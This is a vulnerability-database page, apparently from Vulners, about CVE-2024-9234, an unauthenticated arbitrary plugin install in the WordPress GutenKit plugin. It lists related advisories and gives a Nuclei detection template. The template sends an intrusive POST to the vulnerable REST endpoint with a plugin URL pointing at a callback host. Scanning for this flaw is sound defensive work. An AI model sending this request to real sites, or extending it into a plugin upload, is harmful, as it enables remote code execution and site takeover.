| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| WordPress GutenKit 2.1.0 Arbitrary File Upload Vulnerability | 2 Jan 202500:00 | – | zdt | |
| Exploit for CVE-2024-9234 | 17 Oct 202418:48 | – | githubexploit | |
| Exploit for CVE-2024-9234 | 28 Dec 202411:00 | – | githubexploit | |
| CVE-2024-9234 | 11 Oct 202416:10 | – | circl | |
| WordPress plugin GutenKit 安全漏洞 | 11 Oct 202400:00 | – | cnnvd | |
| CVE-2024-9234 | 11 Oct 202406:50 | – | cve | |
| CVE-2024-9234 GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload | 11 Oct 202406:50 | – | cvelist | |
| CVE-2024-9234 | 11 Oct 202413:15 | – | nvd | |
| WordPress GutenKit Plugin <= 2.1.0 is vulnerable to Arbitrary File Upload | 10 Oct 202400:00 | – | patchstack | |
| WordPress GutenKit plugin <= 2.1.0 - Unauthenticated Arbitrary File Upload vulnerability | 10 Oct 202420:11 | – | patchstack |
id: CVE-2024-9234
info:
name: GutenKit <= 2.1.0 - Arbitrary File Upload
author: s4e-io
severity: critical
description: |
The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.
impact: |
Unauthenticated attackers can install and activate arbitrary WordPress plugins or upload files disguised as plugins, enabling remote code execution and complete WordPress site compromise.
remediation: |
Update GutenKit plugin to a version later than 2.1.0 that implements proper capability checks on the install_and_activate_plugin_from_external function and REST API endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9234
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon/gutenkit-210-unauthenticated-arbitrary-file-upload
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9234
cwe-id: CWE-862
epss-score: 0.10429
epss-percentile: 0.95184
metadata:
verified: true
max-request: 2
vendor: wpmet
product: gutenkit
framework: wordpress
fofa-query: body="wp-content/plugins/gutenkit-blocks-addon"
tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive,vkev,vuln
variables:
filename: "{{rand_text_alpha(12)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/gutenkit-blocks-addon")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
plugin=http://{{interactsh-url}}/{{filename}}.zip
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Failed to unzip plugin", "success\":false")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022072b1e4ad542695a6b5d46bfd77f61f85837845db29d072fdecbae46e5fe5480b022100ccd2586fb12880cad5db004a1b27ca0c5589df129fee5f39e33b51125b54be99:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation